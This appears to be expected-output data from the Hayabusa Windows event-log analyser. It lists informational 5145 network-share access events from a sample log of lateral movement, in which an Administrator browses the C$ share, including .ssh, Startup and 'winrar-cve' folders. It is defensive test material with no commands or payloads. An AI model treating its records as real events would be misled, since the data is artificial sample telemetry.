+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\.ssh  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\New folder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\RDPWrap-v1.6.2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\translations  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\garbage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\winrar-cve  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
